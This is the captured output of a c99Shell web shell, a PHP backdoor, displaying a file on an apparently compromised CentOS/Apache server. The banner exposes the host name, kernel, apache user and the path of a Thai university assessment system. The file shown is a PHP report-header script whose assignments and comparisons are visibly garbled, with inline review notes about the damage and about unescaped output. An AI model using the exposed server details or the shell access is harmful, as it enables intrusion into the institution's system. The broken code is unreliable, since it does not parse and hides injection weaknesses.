!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/fileupdate/eassess/admin/   drwxr-xr-x
Free 50.75 GB of 127.8 GB (39.71%)


Viewing file:     2553-09-26-1.1.05-headReport.php (10.96 KB)      -rw-r--r--
<?php
/*
 * Pre-computes the counters printed in the report header table further down
 * this file: $numAllCourseReg, $numAllDo, $numCourseDoAss and $numDoAss.
 * They are only assigned when $courseId is not the '%' sentinel.
 *
 * NOTE(review): this listing lost characters when it was captured. Several
 * assignment operators and at least one comparison operand are missing
 * (for example "$numAllCourseReg $oReg->..." and "$officerId != &&").
 * The statements are kept exactly as captured and do not parse in this form.
 *
 * NOTE(review): $courseId, $mepId, $sepId, $classId, $officerId, $ttId,
 * $defineid, $acadYear and $semester are not assigned anywhere in this file.
 * If the including script fills them from request parameters, they need to be
 * validated there before they reach the query helpers below -- confirm.
 */
/*
Disabled debug output:
echo "defindId = ".$defineid;
echo "courseId = ".$courseId;
echo "classId  = ".$classId;
echo "officerId = ".$officerId;
echo "programId =".$programId;
*/

// '%' is used as a sentinel value; presumably it means "all" -- confirm against the caller.
if($courseId != '%'){

    
$numAllCourseReg=0;
    if(
$mepId=='%'){
        
//$numAllCourseReg = $oReg->CTByAcYSeClassIdCoId($acadYear,$semester,$classId,$courseId);
        
// NOTE(review): the "=" between the variable and the call appears to be missing (capture damage).
$numAllCourseReg $oReg->CTByAcYSeClassIdCoIdOff($acadYear,$semester,$classId,$courseId,$officerId);
        
// By default the expected number of assessments equals the registration count.
$numAllDo=$numAllCourseReg;
                
// multiple weeks
        
// NOTE(review): the right-hand operand of "!=" is missing in the captured text.
if($officerId != && $ttId==0){
            
$week=0;
            
$oTTA->RSJoinHCByDefineidClIdOfId($defineid,$classId,$officerId);
            // Count the records returned by the lookup above, one per GetRecord() step.
            while(
$oTTA->GetRecord()){
                
$week++;
            }
            
// Expected assessments = registration count multiplied by the number of records counted.
$numAllDo=$numAllCourseReg*$week;
        }

        
// NOTE(review): presumably "$numCourseDoAss = 0;" before capture -- confirm.
$numCourseDoAss 0;
        // $ttId == 0 uses the per-course count; any other value uses the count keyed by $ttId.
        if(
$ttId==0){
            
$numCourseDoAss=$oDo->CountStdByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId);
        }else{
            
$numCourseDoAss=$oDo->CountDistinctStdByDefineidOfficeridClassIdttId($defineid,$officerId,$classId,$ttId);
        }

        
// NOTE(review): "=" appears to be missing here as well.
$numDoAss $oDo->CountDoidByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId);
    }else{
        
// $mepId is not '%': the same counters are computed with $mepId and $sepId passed along.
// NOTE(review): "=" appears to be missing between the variable and the call.
$numAllCourseReg $oReg->CTByAcYSeClassCoOfMepSep($acadYear,$semester,$classId,$courseId,'%',$mepId,$sepId);
        
$numAllDo=$numAllCourseReg;

        
// NOTE(review): presumably "$numCourseDoAss = 0;" before capture -- confirm.
$numCourseDoAss 0;
        
// Same helper as in the branch above, called here with two extra arguments ($mepId, $sepId).
$numCourseDoAss=$oDo->CountStdByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId,$mepId,$sepId);

        
// NOTE(review): "=" appears to be missing here as well.
$numDoAss $oDo->CountDoidByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId,$mepId,$sepId);
    }

}
?>
<table width="100%" border="0" align="center">
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>">
                          <td><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชื่อแบบประเมิน </b></font></td>
                          <td colspan="3"><font size="2"><b>: </b> 
                            <? /* First rows of the report header table. This cell prints the assessment
                                  title, or "-" when $oAF->maintopic is an empty string.
                                  NOTE(review): the title is echoed without htmlspecialchars(); escape it
                                  here if the field can hold user-entered text -- confirm. */
                               if($oAF->maintopic == ""){ echo "-"; }else{ echo $oAF->maintopic; } ?>
                            </font></td>
                        </tr>
<!--                    <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชื่อทั่วไปแบบประเมิน</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b><? /* The surrounding HTML comment does not stop PHP:
                                  this echo still runs and $oAF->nameAss is still sent to the browser inside the
                                  commented-out markup. */ echo $oAF->nameAss ?></font></td>
                        </tr> -->
                        <tr> 
                          <td width="164"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ปีการศึกษา</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b></font><? /* Academic year and semester name.
                                  NOTE(review): $acadYear is not assigned in this file and is echoed unescaped;
                                  if it originates from the request it needs validation or escaping -- confirm. */
                               echo $acadYear ?> 
                            / <? echo $oSse->semesterName;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22" <? /* adds valign="baseline" when programId compares loosely equal to 0 or "" */ if(($oClass->programId == 0) || ($oClass->programId == "")){ echo "valign=\"baseline\""; } ?>><font size="2"><b><img src="../picture/bullet.gif"> หลักสูตร</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> <?=$oProg->programName;?>
                            </font></td>
                        </tr>
<?          /* Course code and course name rows are emitted only when $classId is not the '%' sentinel.
               NOTE(review): the $oCourse fields below are echoed without htmlspecialchars() -- confirm
               they cannot carry markup. */
            if($classId != '%' ){   ?>
                        <tr> 
                          <td width="164"><font size="2"><b><img src="../picture/bullet.gif"> 
                            รหัสรายวิชา</b></font></td>
                          <td width="136"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseCode?> 
                            (<?php echo $oCourse->courseCodeEng?>)</font></td>
                          <td width="130">&nbsp;</td>
                            <td  width="150">&nbsp;</td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชื่อรายวิชา</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseName?></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                            (<?php echo $oCourse->courseNameEng?>) </font></td>
                        </tr>
<?          }     ?>
                        <tr> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ช่วงเวลาประเมิน</b></font></td>
                          <td colspan="2"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><? echo abbreDate(splitDateDb2($oDA->startDate,'/')); ?> 
                            - <? echo abbreDate(splitDateDb2($oDA->endDate,'/'));  ?></font></td>
                             
<?                      /* Year-level / section cell, emitted only when $classId is not '%'.
                           NOTE(review): the </tr> that closes the row opened above sits inside this
                           branch, so the row is left unclosed when $classId is '%'. */
                        if($classId != '%' ){   ?>
                          <td height="22" ><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชั้นปี : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oClass->studentYear?>   </font><font size="2"><b> 
                            <img src="../picture/bullet.gif" /> กลุ่ม : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oClass->section?></font></td>
                        </tr>

<?                      }
                        /* Instructor row: taken when $mepId is '%'. The else branch further down
                           prints the $oMep / $oSep names instead. */
                        if(
$mepId=='%') {     ?>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ประเมินอาจารย์</b></font></td>
                            <? /* Plain cell when $officerId != 0, otherwise a cell spanning three columns.
                                  NOTE(review): this is a loose comparison; a non-numeric string such as '%'
                                  compares equal to 0 before PHP 8 and unequal from PHP 8 on. */
                               if($officerId!=0){ ?> <td ><? }else {?><td colspan="3"><? }?>
                            <font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                            <?php /* empty officer id: print the fixed "not found" message below */ if($officerId == ""){ ?>
                            <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"><? echo "- ไม่พบรายชื่ออาจารย์ผู้สอน -"?></font> 
                            <? }elseif($officerId == '%' ){
                                    /* '%': collect every officer returned by the lookup and print the names
                                       as a comma-separated list.
                                       NOTE(review): $Teachers is not initialised in this file before it is indexed. */
                                    
$t=0;
                                    if(
$classId == '%')
                                        
$oCIS->RSByAcYSePgIdCoId($acadYear,$semester,$programId,$courseId);
                                    else
                                        
$oCIS->SearchByClassIdGroupClassIdOfficerId($classId);
                                    while(
$oCIS->GetRecord()){
                                        
// Look up each officer by the id on the current $oCIS record.
$oOFA->SearchByKey($oCIS->officerId);
                                        
$oOFA->GetRecord();
                                        
// NOTE(review): name fields are concatenated and later echoed without htmlspecialchars() -- confirm they cannot carry markup.
$Teachers[$t] = "อ.".$oOFA->officerName." ".$oOFA->officerSurname;
                                        
$t++;
                                    }
                                    echo 
"<img src=\"../picture/usersGp.gif\"  border =\"0\">&nbsp;";
                                    for(
$s=0;$s<$t;$s++){        
                                        echo 
$Teachers[$s];
                                        // Separator after every entry except the last one.
                                        if(
$s<$t-1){
                                            echo 
",&nbsp;";
                                        }
                                    }
                                  }else{ 
                                    /* Single officer id: load that record and print prefix, name and surname. */
                                    
$oOFA->SearchByKey($officerId);
                                    
$oOFA->GetRecord();
                                    // NOTE(review): no ";" is visible after this echo before the closing brace (presumably lost in capture).
                                    echo 
$oOFA->prefixName.$oOFA->officerName."&nbsp;&nbsp;".$oOFA->officerSurname
                                  } 
?>
                            </font></td>
                             <? /* Week-number cell, emitted only when $oDA->flag is 7. */ if($oDA->flag==7){ //$officerId!=0?> 
                        <td  align="left" colspan="2"><img src="../picture/bullet.gif" /><font size="2"><b> สัปดาห์ที่ : </b></font>
                        <? if($ttId!=0){
                                /* A specific timetable entry: print its week number. */
                                
$oTTA->SearchTimeTableByttId($ttId);
                                
$oTTA->GetRecord();
                                 echo 
$oTTA->ttWdAcYWeekNo;
                            }else{
                                /* No timetable entry selected: print every week number returned, separated
                                   by " , ". $i counts the records printed and is read again later in this
                                   file; it is assigned only on this path. */
                                
$i=0;
                                 
$oTTA->RSJoinHCByDefineidClIdOfId($defineid,$classId,$officerId);
                                while(
$oTTA->GetRecord()){
                                    if(
$i>=1)
                                        echo 
" , " ;
                                    echo 
$oTTA->ttWdAcYWeekNo;
                                    
$i=$i+1;
                                }
                            }                            
                        
?>                        </td>
                        <? /* NOTE(review): no brace closing the $oDA->flag==7 block is visible in the captured
                              text; this empty tag presumably held it -- confirm against the original file. */ ?>
                        </tr>
<?                      }else{     
                                /* $mepId is not '%': load the $oMep and $oSep records whose names are printed below. */
                                
$oMep->SearchById($mepId);
                                
$oMep->GetRecord();
                                
$oSep->SearchByKey($sepId);
                                
$oSep->GetRecord();
?>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ประเมิน     </b></font></td>
                          <td colspan="3">
                            <font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">
                               <?php echo $oMep->mepName.", ".$oSep->sepName?>
                            </font></td>
                        </tr>
<?                      }     ?>
<?              
/* Statistics rows, emitted only when $courseId is not '%'. They print the counters
   computed in the PHP block at the top of this file. */
if($courseId != '%'){    ?>
                        <tr> 
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> นักศึกษาที่ลงทะเบียน : </b><?=$numAllCourseReg ?><b>   คน</b></font></td>
                          <? if($oDA->flag==7) {?>
                          <td height="22" colspan="2"><img src="../picture/bullet.gif" /><font size="2"><b> ประเมิน : </b>
                              <? /* Number of weeks: the literal '1' when a timetable id is set, otherwise $i.
                                    NOTE(review): $i is assigned only in the week-number cell earlier in this file
                                    (the $mepId == '%' path with $ttId == 0); on other paths it is undefined here. */
                                 if($ttId!=0) echo '1'; else echo $i;    ?>
                              <b>   สัปดาห์</b></font></td>
                          <? }else{ ?> <td height="22" colspan="2">&nbsp;</td> <? }?>
                        </tr>
                        <? /* NOTE(review): the value compared with $oDA->flag is missing in the captured text. */ if($oDA->flag==) {   //|| $classId == '%' ?>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                            จำนวนครั้งที่ต้องประเมิน : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?=$numAllDo?><b>   ครั้ง</b></font></td>
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                           จำนวนครั้งที่เข้ามาประเมิน : </b></font><font size="2"> <? echo $numDoAss ?>
                            <b>   ครั้ง</b></font></td>
                        </tr>
                        <? }// closes the $oDA->flag test opened above; the earlier "$officerId!=0" label no longer matches that condition?>
                        <tr> 
                            <?    if($oDA->flag==7) {?>
                          <td height="22" colspan="2">&nbsp;</td>
                              <?    }else{?>
                            <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                           นักศึกษาที่เข้าประเมิน : </b></font><font size="2"> <? echo $numCourseDoAss ?>
                            <b>   คน</b></font></td>
                            <? $numAllDo=$numAllCourseReg;} ?>
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ร้อยละเฉลี่ยการเข้ามาประเมิน : </b></font><font size="2"> 
                            <? $percentDo = ($numCourseDoAss/$numAllDo)*100;  printf ("%.2f",$percentDo);?>
                            </font></td>
                        </tr>
<?                  }// end of the statistics rows guarded by if($courseId != '%')     ?>
                        <tr><td colspan="4">&nbsp;</td></tr>
                      </table>
